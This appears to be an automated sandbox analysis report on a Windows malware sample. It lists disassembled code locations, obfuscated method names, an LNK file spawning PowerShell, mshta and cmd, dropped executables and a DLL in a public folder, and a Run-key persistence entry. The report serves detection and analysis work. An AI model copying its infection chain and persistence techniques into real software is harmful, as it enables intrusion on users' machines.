Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA0AC push 029AA125h; ret	19_2_029AA11D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02993028 push 02993075h; ret	19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02993027 push 02993075h; ret	19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA1F8 push 029AA288h; ret	19_2_029AA280
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA144 push 029AA1ECh; ret	19_2_029AA1E4
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298673E push 02986782h; ret	19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986740 push 02986782h; ret	19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298C528 push ecx; mov dword ptr [esp], edx	19_2_0298C52D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298D55C push 0298D588h; ret	19_2_0298D580
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298CBA8 push 0298CD2Eh; ret	19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02999B58 push 02999B90h; ret	19_2_02999B88
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029A9B70 push 029A9D8Eh; ret	19_2_029A9D86
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298C8D6 push 0298CD2Eh; ret	19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029978C8 push 02997945h; ret	19_2_0299793D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02996902 push 029969AFh; ret	19_2_029969A7
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02996904 push 029969AFh; ret	19_2_029969A7

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\bwsiuvcU.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Ucvuiswb.PIF			Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Ucvuiswb.PIF	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\uc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\uc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Roaming\uc.exe

19_2_02999B94

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
